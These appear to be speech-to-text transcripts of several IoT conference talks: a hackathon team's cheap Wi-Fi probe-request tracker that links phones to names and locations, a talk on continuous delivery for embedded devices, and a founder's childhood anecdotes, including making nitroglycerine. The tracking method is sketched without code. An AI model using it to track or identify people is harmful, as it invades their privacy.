Wi-Fi using their own name. That's sort of information for me. Personally, I found my phone the first day and it had information about the name of my father's company. It suggested that I've been on a boat, suggested that I've been in New York. It suggested that I am from Denmark. I travel to Denmark and visit family. All of these things are clues that you can pick up on. And it's surprisingly easy to go from anonymous data to at least being in a situation where you can make an educated guess about the identity of the person. But we, of course, were not satisfied with just having this semi-identity information. We wanted to do something more. So we came up with a tool for enriching our profiles. Basically, the idea is that if we are going to give this away for free out in shopping malls or whatever, we want people to sign up for it and give us some information about themselves. So we created this. And basically, this is a, again, we had some really cool music here, but no. The idea is that you scan a QR code here and you log in. You log in with just punching in your name, basically. And we immediately are able to tie that information to your profile here. So Hans Anna is just tied in his name and we've already picked it up and pushed it to the dashboard. And if we go here, we'll see that when he updates his information, so do we. And this is pretty cool. But imagine that you've swapped out just a name with maybe a Facebook Connect or something. That would probably be easier to do. And now you have the real-time location data connected to information about who is this person in real life, who is their friends and family. These are their pictures. These are their interests. Could we sell something to them? I don't know. Pretty interesting stuff. Last but not least, we have an attempt at triangulation, which is basically taking the signal strength of each of these hubs that we are collecting information from and trying to do a calculation based on the signal strength. If you have this good signal strength here and here, that should put you in maybe this area. And to be perfectly honest, this didn't really work. That's not at the venue that we were at. It was a closed room, not very big, and we had just too much duchy data. I can show you because we have a small demo here. We made a tool for calibration, and you can also trigger these probe requests. So every time we press there, we get an update on the screen. This is pretty much just garbage. We used this tool for trying at least to calibrate the triangulation. I think it would probably be possible to get a lot better results if you were out maybe at a larger place. Something like that would probably help a lot. Anyway, we were free guys. We put this together over three days. When we chose the subject, we knew that it was possible to do these things. These things aren't new. They've been around for a long, long time. Your mobile phones are leaking information all the time. There are many companies out there building tools that use that information for really useful applications. Like if you go to the airport and it says there's five minutes of waiting time, that could be something like this used to see who's coming and going and how long are they staying in this area and using that information to calculate the queue. People use it to measure traffic, those sort of things. Plenty of useful scenarios for this sort of technology. But it's also kind of scary to see that free guys with free days at their disposal and with hardware that cost less than $100 are actually capable of putting together something like this. It was surprisingly easy to do. That technology is widely available. You could go out and pick up a couple of Raspberry Pis or a couple of Wi-Fi dongles and start putting this together and tie that up together with a battery pack, drop it out in garbage bins around down, and actually you've built a pretty good surveillance system. I guess that's probably the takeaway here. We have all of this cool new technology that's fun to make and fun to use. But every time we're introducing all of these exciting opportunities, we're also introducing opportunities for abuse. Already technology is part of everything that we do every day. The introduction of IoT devices in our homes, on our bodies, these things, opportunities for abuse are just going to explode. There's going to be so much more of it. I think that the takeaway here is that, damn, this was easy. We as developers have a lot of responsibility that when we make stuff, we do it with a bit of deliberate thought about security measures, those sort of things. It's been very uplifting to be here today and hear people talk about it. It seems like the red line that goes through everything here has actually been security. That's very comforting to know. These are a couple of profiles that we put together at the conference. When I made this presentation on the last day, the guy who was after me speaking, he actually recognized his profile on the right there. That was kind of funny. I'll just end off by saying that Arctic IoT Challenge was a month ago. There's 11 months until next time, I guess. It was a ton of fun. If you guys are interested in IoT, I suggest that you make note of that web address there right now and you remember that for next year. Maybe go in. I don't know if you can sign up for a mailing letter or something. It's going to be great fun. It's only going to get bigger. I would love to see everybody next year. Any questions? Yeah? Actually, I don't know. I'm guessing it's probably trying to reach a specific network and get a response. Do you know, Asper? Basically, what you're saying is that it does it to speed up the process of connecting to the Wi-Fi network. That's great. We actually have a situation here where it's more important to get connected to the Wi-Fi network a couple of seconds faster, but at the same time, just giving away a lot of information about that's cool. Anybody else? Okay. Thank you. Thank you.
In February Team EvilCorp took home the 2nd place at the first Arctic IoT Challenge. With only three days at their disposal three people were able to put together both the hardware and the software required to track actual people based on data "leaking" from mobile phones. Using hobbyist hardware that cost less than $100. The technology required to do so is in no way groundbreaking, it is well known and has many useful applications. The big surprise for the team was how easy it was to abuse seemingly innocent data. With IoT gaining ground, these are things developers need to care about. In this short session we will take a closer look at what we managed to build during a three day hackathon.
10.5446/50515 (DOI)
Hi, everyone. My name is Mike. I'm from Pragma, a continuous delivery consultant. This is Internet of Things Day, so I want to talk about integrating all the things. My background is in embedded systems, large-scale embedded systems for the oil and gas industry. So I spent more or less 10 years building these big industrial things that you use to find and drill for oil and gas. But since then, I've been focusing more and more on making teams develop products faster and the tools and practices around that. And that's what I want to talk about, the intersection of these two things, how to make products that are physical, integrated, Internet of Things devices, and how to do it efficiently. And look at some of the, so I would say the ecosystem around all this. So our mission, should we choose to accept it, I want to show that there is some real challenges, obviously, in developing reliable IoT products. There's been a lot of talk about security today. And I think this is a big concern we all have. And I think one aspect of security is one aspect of the kind of quality we'd like to build into these products. So we're going to explore the techniques that we can apply to the problem and look at case studies for customers, for companies that are already working on this stuff. I'm, like I said, an embedded software person with a flavor for DevOps these days. I'm also a trainer. I do give courses in Git and Jenkins and TDD. And I'm a certified Docker trainer for what that's worth. And I also run a business here in Oslo that helps companies adopt continuous delivery. So how many people here consider themselves embedded software engineers? Okay, there's a few. So for me, when, I don't know if you guys are the same, but when I first heard the phrase IoT, I kind of rolled my eyes. Actually, I felt like I've heard this all before. We had this 10 years ago when it was called M2M. And it also feels like, in a way, DevOps to me does. It's a cute phrase that's fun to say. But it just gives a name to something that's been around for a very long time. Whatever way you think about it, IoT has always been there. We've always made embedded devices with internet connectivity as long as there has been internet connectivity. On the other hand, it is a really fun space. And despite the fact that it's got a funny name, IoT is actually a ballooning industry. There's more and more things that we're connecting to the internet. This is why we have IPv6 in the first place. So we're going to have an explosion of smart devices. And this is fun time to be a technologist. So I'll try and not to be a grumpy old man about IoT. And I'll just embrace it today. So I don't want to describe IoT, but briefly I just want to look at the attributes about IoT, the IoT, and how they were, these will play an important part to how we can build these systems. So the most important thing about IoT is that they're the T, actually, the things, they're physical things that happen to be part of our world. There's hardware and software co-design and they interact with our environment. They are either sensing and monitoring the environment or they're actually actuating on the environment that we work in. They're also distributed in nature, connected via networks. And often, although they can often work in coordination, they're usually independent actors focused on one specific need. And the idea with these IoT things is to add some intelligence to otherwise dumb parts of our world. It's not just fridges. So this is another way to describe what IoT is, intelligent, distributed, physical systems. Now, for those of us that come from a software background, actually all those words kind of terrify us because we know that distributed systems are hard. We know that making intelligent systems is hard. We know that making physical systems is hard. So that's what I want to talk about today. This is a hard thing about hard things. What do we do when we're faced with these very difficult problems? There is complexity in this problem. There's complexity in distributed computing, of course. This has been known for a long time. The guys at Sun, microsystems always knew this. This was their domain, actually. Their problem space was the network computer. And there's a list of fallacies that everybody working with distributed computers or designing distributed systems kind of fall prey to. We design these systems thinking that the network is going to be reliable, latency is going to be zero, bandwidth is going to be infinite, blah, blah, blah. We just can't think of all the ways that these things can go wrong in reality. But that's not, and that's part of IoT, right? They're distributed systems, but they're not just distributed, they're physical systems. So there's a lot of fallacies that people making embedded systems, hardware and physical systems fall prey to as well, such as the hardware always works. The environment never changes. The resources are endless. We're never going to run out of memory. The sensor is always going to be calibrated. The data we're reading from our sensor across three time zones is definitely live. It's not just returning the same thing over and over again. We're assuming all kinds of things. The clock is in sync. The data it's giving us is actually at the right time that we believe it to be. And then, of course, we have the more life cycle issues. How do we keep this thing on? Is the power reliable? What happens when we lose power? Is there a safe time to lose power? And what happens when it comes back on again? How do we keep these systems up to date? And actually today, most of the talks that we've gone, that I've been to, I've been security focused in some way. And Hans Alpou was in the rifle talk. Right. This was a really cool talk about how to hack a Linux powered rifle. The interesting thing is when the flaw was discovered and it was published, the manufacturer said that they would send out an update on a USB stick to the however many thousand of people that have bought the product. That's not a really scalable way to update your system. We need systems to be up to date. And as we connect them to the network and we bring them into our home, we bring them into our body, we let them drive our cars. It's of paramount importance that we keep them up to date. And then of course, there's the fallacy of intelligent systems. There is the idea that we'll always, I mean, we're smart enough to figure out how to do this thing. And that's never true. Complex systems never work. It's been known ever since we've had systems, actually. Complex systems never work. The first time you do anything, it will never work. John Goll has written a lot about this, but so has Jerry Weinberg. There's a lot of good information. Obviously, the first thing, the first time you do something, it never works. But that's why you should start small. All the best systems start from small simple things that work. This sounds pretty familiar, right? And this is the way we've approached software in the last 15 years as well. We don't want to design a big complex system. We want to start with something small. It's right to make it bigger and bigger, more and more features, do more and more stuff. This is how we figured out how to actually make software. We realized that we couldn't do complex things. We couldn't design it up front. For me, there's two very important principles in NAHGEL manifesto that come into play here. The one is that obviously, we want to start early, give value continuously. And that working software is the primary measure of progress. So without these, those two are actually another way of saying this. How do you start from a small system and grow it into something that's complex and still have it work? And it's these two principles that are the enabler for that. And for me, coming from a continuous delivery point of view and continuous integration point of view, these are the two principles that we try and solve with continuous delivery. So I'm not going to go through, this is just a fond cartoon, but I'm not going to go through all of this, but the point is that there is a system in place that we've decided in software to make sure that if you like continuous delivery is the technical implementation of those agile principles, how do we make sure that we can continuous delivery deliver valuable software that works? How do we make sure that the software already works? Well, we have continuous integration, which is the gray box. We say that once the software builds and it runs any kind of simple test, then it's good enough to share with my colleagues. That means I'm not going to break it for anyone else. But that's not to say that after that point, it's good enough to ship, it's good enough to put in your car, it's good enough to put in your pacemaker. After that, you need what's called the continuous delivery pipeline, where any other steps in your process that need to happen before the code can be considered potentially shipable has to happen. And obviously, I would promote as much of this to be automated, but some of this stuff can take a really long time. For instance, with the trucks at Volvo, they have to go through many, many steps before you could say that this is actually good enough to go into a truck. But still, there is a pipeline, there is a process, and there is a way for always working software to be ready for the customer. That's all it is. Continuous delivery is just the implementation of those principles. So I want to go back to the things and the Internet of Things, because for me, that's the most interesting part. The Internet isn't interesting, it's just a network. But the things that we attach to it are actually the important thing. I'm going to contrast that by looking at a project that was actually my very first project after graduating, and look at how we made software then and how we make software now and see the differences. So I was young, I got a job after university to join a company that was making products for the oil and gas industry. And my first project was to make a rotary steerable drilling tool, which is basically a long tool that has some pads on it on the side and then a drill bit. And then when you're drilling for oil, what you do is you put this down into the well bore and you spin it around. You have a long pipe all the way up to the top, to the rig, and you spin it. Spin it really fast, like 200 times a minute. And while this thing is going around, you want to spin it. You want to steer it. So you've got gyros, you've got accelerometers, you've got shock measurements, all these things. And in real time, you want to try and drill a path towards where the driller wants the drill bit to go. So this was quite a project for someone straight out of university who never programmed C before. I was determined to make a go of it and I wanted to learn as much as I could. So I wrote down all the steps that were necessary in this professional world of software development. So I found out the first step you do when starting a software project is you take a copy of the code base for the existing product. So we're going to make a new tool. Well, there's an old tool already. Let's just copy the code base for that product. We'll start from there. And then what you do is you spend a few months documenting its current algorithms. This is important because nobody knows how this code works. The person that actually wrote the control systems long gone. And it was done four or five years ago. So it's going to take some time to figure this out. You might need to have a systems engineer around for the math. Then what you want to do is be very careful about the changes you make to this source code because you know what kind of sort of works. So any changes you make, surround them by FDF so that you can always switch them off again if it doesn't work out. Then the most important and the longest part of this development process is testing. So what you want to do is you want to test it on your own hardware on your desk. You want to put it into a tool and test it down in the shop. You want to put mud through it and power up and watch it steer in an automated flow loop. And you want to go to Oklahoma, you want to go to Siberia, you want to test it on the rigs. Take as much time as you like for testing. And then finally when you're happy with the results, everybody's happy. You commit that code as a new project in the version control system. And you hope someone's going to take care of merging it into the previous project at some point in the future. Then you compile it on your laptop and give it to manufacturing. That's how we do professional software development. At least that's what I learned. I knew it was professional because we had a software development process and I followed it to the letter and it was part of the product development process and part of the project governance approach. So we were ISO 9000 certified. So we were very professional. I mean, I am being ironic though, but this project was actually considered to be very successful. It was very successful. The product worked, it met its commercial goals. And that was largely due to this step four where it was lots and lots and lots of testing. So there's two sides to this. This can work in that kind of context. But if we move towards the modern times, this type of software development doesn't work. And I want to contrast this kind of project to the way we do embedded systems now. So ideally, instead of having this as your professional, as your software development process, you would have something more like this. As a developer, what you do is you fetch the latest source code, which is up to date with whatever is released, what your customers are using. You branch, you implement your feature, you test it on your machine. When you're happy with it, you think it's good enough, you appreciate it to the central repository. The continuous integration system kicks off. It starts building your system, building your code, doing any unit tests you have, maybe any quick smoke tests you have. And if they're good, your code should get merged into the master branch. Then that should kick off a continuous delivery pipeline, which will do the static analysis, program your code onto a device, verify the device and the hardware and the software work together in an environment. Maybe you have a lab setup. You might even do canary deployment, where you deploy this to some customers and check that they're still happy and there's no complaints before you send it to all the customers. And then you want to get some real-time production feedback for those things. Now, I don't think there's anything too controversial here. This is the way most software is developed in the world. This is the way we should develop. This is if you go to any newspaper or broadcast or this is anybody with a website, really, this is their approach. So let's take a look at the difference between a project like this and a project like this. So back then, embedded systems were versions like this. You just put them in a new folder and give it a different name. If you are really, really conscious that you might make a backup every week and give it a name of the date. That was how you did product versioning. But now we have distributed version control systems. We have branching strategies that actually make sense and work so that we can always work with working code as a team. Now, I don't want to talk about branching strategies, but I want to talk about this. If you're working in embedded systems, this is a great book. It tells a practical approach to large scale agile development. It doesn't sound very interesting. I know. But it tells the story of the laser jet business from Hewlett Packard. The embedded systems for those, there was 800 people spread across five different continents and they had really tough legacy software issues. The book tells the journey of them transitioning to an agile way of working. They had a different branch for every product and they were trying to maintain patches and branches across all these hundreds of different laser jet models. They had, I think, almost 100 people whose job it was just to merge and patch and build their software. You can imagine how slow and how unresponsive the system eventually becomes. One of the key learning points is just this. Actually having a release-trained branching model, branching strategy can hugely improve your development speed. Of course, now we have better ways of versioning as well. We don't just take the subversion number or the git sha. We have a way to put some semantic meaning on our versions as well from the products we built. We can tell consumers whether this is going to break, if it's a breaking change, if it's just a new feature, if it's a bug fix. You can figure out how you want to change your dependencies. Of course, we can stamp this information right into the products. This is important. Actually, Novella is a company that I work with. What they want to do is they want to, from one of their radars, be able to find out exactly what version of software is in that radar. From all the different components, all the different binaries, what versions they were and which git sha they were related to, which build information where I can find them in the artifact management system, you can put that right into the binary. You can ask the radar itself all this information. It's just simple stuff. You make a version.h and a build.h like we've always done. You have the system generated for you. Also, one of the things that have really changed between back when I started and now is that product families are really different. When I was starting systems, you had the old systems, which were maintained by what was called the sustaining organization and the new products, which were made by the engineering department. It was really interesting. Today, we talk about DevOps, about bringing operations and developers together. In a lot of engineering organizations, it's even worse than that. There's a support function and a development function, and they don't even talk to each other. The people that are making the stuff are not the people that are supporting the stuff, so they never get that feedback from the customers. That was very much the case. I think it still is in some places. Now, we don't have the old one and the new one. We have the family. We want to sell products. We want customization. Like Volvo, every single truck they make is different, but they have to use the same stuff. They have to use the same software, the same tools, the same tests. That only works if you can reuse. Of course, back then, I was building an ID. I don't think anyone does this now, but this was how we cut a release. We opened our laptop and we pressed build. I think that this blog post from Jeff Atwood really changed the way we approached this. It's crazy. It was only six or seven years ago where he said you should have a script for your build instead of using the ID, and it was considered like news. I don't think anyone would release software like this now. The thing that was missing, of course, is the traceability to figure out how was this thing made? Should I be worried? Where did it come from? How do I make it again? How do I reproduce this? Can I get the same results? What we do is we put this in, we create a Jenkins system, a server that can do all this. The idea is that, while at least the server we should know a little bit about, if it's a developer laptop, we don't know so much. We start putting all our configuration in this Jenkins user interface. I don't think that's a very good solution either because who knows, anyone can change that. Nobody can track it. The traceability and reproducibility of using Jenkins isn't really there. It has a lot of other benefits, but you won't solve those problems with using Jenkins. What you need to do is instead define your builds as code in some way. Find some kind of text format that you can version alongside your software so that you can track exactly how something was built in the past. You want to check out a version of the code from a year ago. You want to know exactly how the build server was set up then. This is job DSL. There's a lot of different ways to do this, but this is one way. You don't even have to stop there. You can go way beyond that and look at the whole ecosystem of tools you use and figure out what would be a traceability ecosystem for building these products. How could I use Artifactory and configuration as code tools like Docker and Vagrant and Puppet to actually be able to reproduce reproducible development environments from code that is version controlled. Maybe this seems like going a bit too far, but for a lot of, especially safety critical systems, this is the only way you can really control how something was built, which header files were included in the build, what was the library path when something was built. These are all important considerations and you can only do that when you have control over the entire environment. This is something also, for me, interesting about Docker because I was at DockerCon and there was maybe 100 presentations there this year and they were all nearly from web companies. All the places that I'm implementing, well, say 99% of the places that I'm implementing Docker solutions, they're embedded safety critical places where they want to be able to say, I want to rebuild this ASIC. I want to know exactly that this same ASIC is going to be built or I'm going to put some code that controls the breaking system of our truck. I want to be able to know exactly how it was built. There's a lot of different uses for Docker, not just for creating microservice websites. Then of course, if you have this configuration code, you can have Phoenix builds. You can basically spin up and spin down build systems as you please. They're no longer special dedicated build servers. You can use the cloud to rip them up and tear them down and create new ones as you please and the developers can have access to the same environments. One of the fun things about that rotary steerable drilling tool that I was telling you about is that the only way to update the software was to send a zip file to basically a workshop, a mechanical workshop, and people would maybe take the tool on a helicopter from the rig to the shop and the mechanics would open it up. Then they would attach a JTAG to it and flash the thing. That was the only way to update it. Now, we have a lot of systems where they just get updated automatically over the air. The latest version of the software is always available. Now, this is a really hard thing to get right with the IoT devices because there's so much that can go wrong when an update occurs. We get used to over the air software updates with phones and so on, but actually to implement this on an IoT device, if you make it yourself, it's very, very difficult. It can take a year of development to be able to have a reliable update system that you know that no matter what kind of failure mode, you won't break the device. Now, that's all well and good. This is how we build the software. I think the only way that we can actually have this continuous delivery of working software, the actualization of that is only if we take testing seriously. I see a lot of companies that really focus on automation, but it's always around build. Their testing is very, very weak. The testing is the only thing that makes sure what you're delivering is actually any good. There's no sense in delivering crap really fast. Anyone can do that. So there's a lot of discussion like how does testing fit into IoT embedded, all these kind of product kind of devices, like even if you're making cars, what does testing look like? This doesn't really fit. We don't really think about UIs and services. Obviously, we have units, but we do have a testing pyramid, but it's not quite the same. Of course, we need this idea of a system test, a full level system test, integration end to end, full test. This is the only way you make sure everything is connected. In IoT devices, this usually requires a lot of programming actually. You need to spend a lot of time to automate this because unlike unit tests where you just use a test framework for your language and start writing tests, system tests for embedded and IoT devices actually require a lot more. They're usually very custom things. You need to be able to control the power to the device, turn it on, turn it off. You need to be able to program it with new code, like access its flash. If it is a device that engages with the environment in some way, changes the environment in some way, you need to control those actuators through some kind of API. And you also need to be able to sense the results. One system I worked on was a steering system for marine seismic acquisition. What that was is a big cable you drag through the sea and you steer it around. They want to make sure it's at the right depth and it's in the right place. How do you test something like that? You can send it lots of commands and you hope that what it's doing is correct. But what you need to do is sense what it's doing physically in the world. You want to see that actually the blade is at this angle. So you need to have some kind of watch guardian over these systems to see if they are interacting with the environment that they interact correctly. We don't have services, but we do have components. We can test things in isolation and we should aim to test things in isolation as much as we can. The idea of microservices is just as equally applicable to IoT and is to figure out what is the way to isolate the change and find an abound in context for these devices. And of course, unit tests are great. We should have them everywhere and make development super fast. I get a lot of pushback actually from management when I show this slide because they say, well, if I'm writing all these end-to-end system tests, why do I need the unit tests? And if I'm writing all these unit tests, why do I need the end-to-end system tests? I didn't really have a good answer for that until I read this book, Growing Object Oriented Software Guided by Tests, which is really good. It doesn't really say much about IoT, but what it does tell you is different types of tests give you different types of feedback. And the important thing to know is unit tests give you a lot of feedback about your internal quality. They tell you that the code is easy to change, is probably well understood, that it works how the developer expected. It doesn't tell you anything about your external, about your, where are we? It doesn't tell you anything about your external quality. How much this, together as a system, meets the requirements of the customer. And the same is true for the end-to-end tests. The end-to-end tests tell you very little about how easy the code is to change, how safe it is to change, but it tells you an awful lot about whether the system as a whole meets the needs. Clear? No. So with IoT, it adds an extra level to this because what is a system test in the context of IoT? These IoT systems are distributed in a sense. When you say end-to-end, if your intelligent light bulb connects to a cloud service which connects to your phone so that you can control the hue or the color of this light bulb, how do you do an end-to-end system test? Do you include the whole internet? Do you include deploying a web service to do this? This is a really hard problem to solve. And you have to solve it because it's the complex nature of the interaction of all those things together that will produce your failure modes. Another important thing is that there has to be access to hardware. The developers and the testers and the customers, they all need access to this hardware so that you can make sure that what you're running in the lab is the same thing that the customers are using and is the same thing that you have on your laptop. So the goal is, I wrote this slide yesterday, the goal is to go from one-year product cycles to one-hour product cycles, the difference between using continuous delivery and the old way of doing software. And I thought that that was quite a gimmicky sales pitch thing to say. But then when Peter talked about Volvo, he talked about going from, I think, 46 weeks to 10 minutes. So it is actually, this was maybe a little bit underambitious. When you can get development cycles from one year to one hour, it really changes the way you can deliver product to customers and change your plans. Another interesting aspect of this is the Novella story. Now, Novella make this radar trip, it's very clever, it can do all kinds of things. It can detect your breathing, it can monitor your breathing, it can know whether you're sleeping, it can tell us how many people are in this room, whether they're dead or alive, for instance, small details like that. And they take continuous delivery very seriously as well. But they have a problem. When they make a radar that's in right signal processing that's supposed to monitor whether a baby is breathing or not, how do you test that? Actually, one of the first months I was there, I actually called up some friends that were on mama permission and they came with their babies and we put the radar on them. That was fun because we had to tell these mothers we're going to put radars on your babies. Is that okay? Surprisingly, they said yes. That's some trust. But that's not reproducible, right? Even if we collect all that data and run it over and over again, that's not a good test. It's maybe a good acceptance test, it's maybe a good product demonstration, but it's no way to run your development process because between the time that test is happening and the time you deliver your product, you might have made a thousand or two thousand commits all changing the behavior of your code. So the guys at Navelda were very clever and what they realized was that if they took a ball bearing and rotated it at a certain frequency to the radar, it looks just like the chest cavity of a baby. You get basically the same information. And because LEGO is more or less invisible to radar, it doesn't have a very high reflection, this was a great way to, this was a great solution. What they did was they set up a lab with all this LEGO. There's people at Navelda that get paid to play with LEGO and they build all these different kinds of systems to produce like a baby or whatever it is they happen to be testing for. If you want to test elderly care, you can just make a bigger ball bearing, rotate it slower, I don't know. But they have lots of fun robots there. And they took it even further as well. Continuous delivery wasn't just on the software, it was on the ASICs that they're producing, the hardware chips that they're taping out and silicon labs, right? They make a change to the RTL, the definition, if you like the source code for their ASIC. They do some firmware builds, they do some system testing, they do synthesis, does this ASIC still synthesize, do all the tools work, can we do root and place? And then we do the final system test and if that's good, then we know we have something still on track. And so you can go really far with this stuff, even outside of the realm of software. And this is where hardware, software, co-design can become very interesting. Like I said, in marine seismic, we have very similar systems, right? Systems could fail in all kinds of strange ways. When you have 100,000 sensors and all kinds of physical equipment that you're dragging in the sea, you know, a shark could come and take a bite out of it thinking it was some food, all kinds of fun stuff. But one of the most interesting things, like in terms of IoT, I think that is applicable, is the idea of FMEA. Does anyone know what FMEA is? So it's failure mode effects analysis, I believe. Thank you. And the idea is what you do is you sit down and you look at the system and you look at the whole picture of the system about all the things, ways it interacts with the world, all the different ways it could fail. And then you say, well, if that failed, what would happen? And if that failed, what would happen? And if that failed, what would happen? And you get a list of all the outcomes from different failures and try to look for complex failure modes. And then from that, you have to figure out, okay, well, how do we mitigate those different kinds of failures? And it's a very systematic approach. We say, okay, well, these ones, we can test them, actually. We can add test systems around this. These ones, we can add tests in production so that if something happens while the software is running, we can recover from this, we can try and do that, we can set this kind of state in the software. So if you are building a complex IoT distributed system, I recommend you take a look at FMEA. That's about really it. I just want to finish with one story, so I think every talk so far today has had a slide with Tesla in it, so I didn't want to be left out. And this is the story of the hill start. So there is an idea of what is the purpose of being able to go from one year to one hour in your delivery cycle. And the purpose is to respond to your customers. Now, a couple of years ago, Tesla, they have the product forums on their website, and one of their customers wrote in and said, I'm really annoyed when I'm at the hill and there's a traffic light and it's a red light, I'm sitting there with my foot on the brake, I take my foot off the brake and put my foot on the accelerator when the light goes green, and the car slips back a little bit before it starts going forward. This is ridiculous. This is a luxury car. This should not happen. Other cars have got a hill start feature. Why doesn't the Tesla? So I guess someone in product marketing agreed with this guy, and the product teams started building the feature. They tested it, I hope. And then the software was ready to be released. It went over the air. The Tesla's automatically upgrade over the air. They're firmware. And then the customer, one day, got into his car in the morning, switched it on and said, the dashboard on the Tesla said, good morning. Your software has been updated overnight. We've run through the system test. You're good to go. By the way, here's a list of the new features that you have now, and one of them would be hill start. And if you were that customer complaining on the customer forums, you would feel like static, right? And that's the purpose. Now, I think in the last talk, somebody mentioned about the Tesla hack. Some students have managed to hack Tesla. And this is the flip side to being able to be responsive to change and be responsive to the environment is that when the researchers found this flaw, they went to Tesla. And the researchers praised Tesla for the way they handled the problem. And Tesla gave them a reward. They fixed the software. They released it automatically over the net, and everybody got this new fixed software. So that security flaw was fixed for everyone. Now, other companies also find security flaws, and they don't fare so well. Like the Fiat Chrysler had to recall 1.4 million vehicles because the hackers found vulnerabilities. And it's like the sniper, the rifle sighting, when that was hacked, they wanted to send USB sticks to the customers. That's not a solution to the problem. So this continuous delivery can actually help both in the security side and in the market penetration side of the story. That's all. Does anyone have any questions? Okay, well, thank you.
Hardware, firmware, software, cloud, big data - help! How do the best companies manage the complexity of software development in the world of the IoT? This presentation will show the challenges of developing for the Internet of Things, and provide examples of how real companies have managed the complexity with continuous delivery, devops and test automation.
10.5446/50519 (DOI)
You You Okay, so thank you for inviting me. I think IOT is something we A word that we have just recently heard about but I think in terms of technology and what it does and what it is I think we all feel that we have seen it before When I think about IOT and I see what people Define it as today. I remember I worked with axis communications back in 1995 We made a camera that was connected to internet and that was Internet of Things and we have built a lot of stuff from 1995 until now which we have connected on Internet of Things So I don't think it's a lot of I mean there's a lot of new things But I think the term Internet of Things has has been seen has been viewed as something completely new But for us developers, we know that's been going on for a long time. So it's a little bit frustrating to try to understand What the word means? I mean what what really Is this big change from earlier and to now is how we as people are willing to play with all these things? And it's it's how we are willing to adapt to all this new social media stuff and gadgets and I think that's the Sometimes when I wake up in the morning I ask myself do I really enjoy this or is it too much? Do I really simplify my life or does it make it more complicated? I mean, I'm a gadget guy. I admit that I mean I I'm an early adapter or everything I got the first Tesla in Trondheim and I had and that was my second Tesla because I also had the first Tesla which came before the the Tesla that everyone knows about and The Tesla is great. I mean I can when my wife is driving I can follow her on my map and I can open the window if I think she's too hot or or I can actually I can actually blink with the lights or Hunk with the horns or do all kinds of things remotely when I'm in Texas in the board meeting in Silicon labs or whatever So I mean that's really in need feature, right? And I have the eye grill thermometer which which I can follow my stake on the grill while I do something else surfing internet or controlling my house or Or do something like that and but I think it's a And I have this wonderful watch and it will probably soon say that I have stepped 10,000 steps already So I'm good for the day. So I mean all this kind of things starts to annoy me This morning. I got a message from my summer house. Oh the kitchen has not reported in 24 hours And yesterday the bathroom had not reported in 24 hours I started to getting emails from all the stupid gadgets around and in my summer house I have like probably 30 sensors and they ran out of the battery because they send me all these messages So I have to go to my summer house and replace 30 batteries and then I go back and then I can see online Okay, I'm back online. I'm back online. I'm good and I think okay It's good to that these all the things are there and they do things for me but do they have to annoy me all the time and and then I realize that Internet of things starts to be something that Can be a problem and and we all know we haven't even started yet So it's a the good thing is that I think the other day here I was driving in my car and I was listening to the radio and they said okay So there's a new feature coming that when you die you can put a little QR code on your gravestone And I think okay QR code on my gravestone and then I start to Google it and it wasn't really a new thing It was something that was actually enabled already in 2012 So when we die we can put a QR code on the gravestone and when you when you put the phone there People will get the story of your life, but the important thing though is of course you have to make the story before you die Because it needs to be your story. So I started on my story and I haven't completed it, but I've started So this is how it could look like and this is a part of my story. I will remember you Will you remember me? Okay, so everything there I wish was true except Angelina Jolie. I enjoy my wife much better than I think But I think the the key thing here is I mean, why can't we just die on Facebook? They know everything about us already. So we don't have to make all these videos That would be the easy way Okay, so back to the real story. I mean, of course, I didn't win the Tour de France I was not first on the moon obviously and but I mean if you if you think about it You can make a lot of stories like that and but my story is a little different I'm gonna go through the story because I think it's important for what I believe is my most important Characteristics to actually create new companies and be an inspirator for further people. I mean, I was born in 1966 same year as Walt Disney died and He said you can dream it you can do it and I usually say I can dream it I can do it So almost the same but but not exactly The little girl up there is my sister Where I called her my test rabbit because I had a when I was a kid I was experimenting with everything I had a chemistry lab. So I made chemicals and I some of them was supposed to give strength and power So I had to test them and drink them But I didn't want to test them and drink them and my little sister was two and a half year old younger than me So she was the person to drink and test them and sometimes that wasn't really good We also had a radio station. We sent out the radio messages Into the street where we live until the police came and shut me down But I've always been very very enthusiastic or interested in flying So I built my own hang glider I took this big green plastics and Four ski poles and Builded a square hang glider and I stepped up our house was like six meters down to the ground and I was standing there I said oh shit. This looks a little small or I look a little too heavy. I need someone a little lighter And guess who was lighter than me? that was my little sister and So I pulled her up there and said hey, this is gonna work fine and I just pushed her out and she fell straight down six meters into the ground and Fortunately there was a big thorn three with thorns there So she fell into that since she survived she didn't fly even a meter from the from the from the wall It was just straight down. It was a free fall and We had to pull out the thorns from her and and She was she was okay. I mean we got friends maybe 20 years later But I mean that was one of my experiments. We also made nitroglycerine My friend had a father that was a professor chemistry professor at NTO and then you and When he was at work, we could go into the chemistry storage and we can get whatever Chemicals we wanted. I mean get or steal. I don't know what we call it But at least we got access to a lot of chemicals that you can make Make a nitroglycerine with so we did that and we we are actually Buried it down into the ground because if there was a new war coming we wanted to be prepared and we wanted to be the new It you can't team or the new guys that work actually save in the country But then we had to have some explosives hidden somewhere So that was a part of my my childhood and I think my first electronic invention was curtains that opened when my my Wake up clock actually was ringing and you remember the old wake up clock which was rounded You twist it up a spring and then when it rotates back that actually switched a switch and then it powered up to wipe their engines From a from from and then it just opened my curtain So when I when I was waking up in the morning, the curtains just opened up and the light came into my room I Asked my mother what do you remember? What's your worst experience with with me when I was young and she said when I came home as 11 years I was 11 years old and she came home from work and I had mounted a huge antenna on our house Because I wanted to add a radio communication now I was walking talking guy and I was dreaming about being a radio amateur, but I was only 11 right so it's But I had a huge antenna not as big as this one obviously But and the whole the picture there with a little hole is still in the house actually to get the cable to the antenna into the house And then I asked my my wife what because we got together when we were 14 God knows what she's made of But I think she remembered my room my kids room Because it was full of airplanes and it was full of Electronics and I had a huge carpet which was popular at that time and in the carpet you had Semiconductors and you had resistors so when you stepped on it you started to bleed and you cut yourself So that was her memories so Moving on we graduated from the engineering high school and or and and then and then enter and enter who at that time and then you and we started to I met VEG are and And we were both very interested in microprocessor and we started to get her at Nordic semiconductor or Nordic VLSI at the time and We did the risk microprocessor that was made originally for for a for a decoder for digital TV and Then we started to sell components. We started we changed the Nordic from being a consulting design consulting company to selling products and And what happened then was that the the management? Didn't really believe that to build microcontroller source the way to go So we decided to leave the company and we bought the rights that That Nordic semiconductor had and we actually went out to find a partner And that's where the AVR history started and I'm gonna go a little bit through the history We actually Had a vision to make an easy to use microcontroller and we wanted to make it available for everyone The design tools from microchip at the time was two thousand dollars and the compiler was two thousand dollars So it was very very hard for us as students to get our hands on something like that So we wanted to make something really unique But we also had to be very unique on the microprocessor itself And we decided that flash technology is something that we have heard about and that's something that really is something we need And there were two options at the time. It was Hitachi in 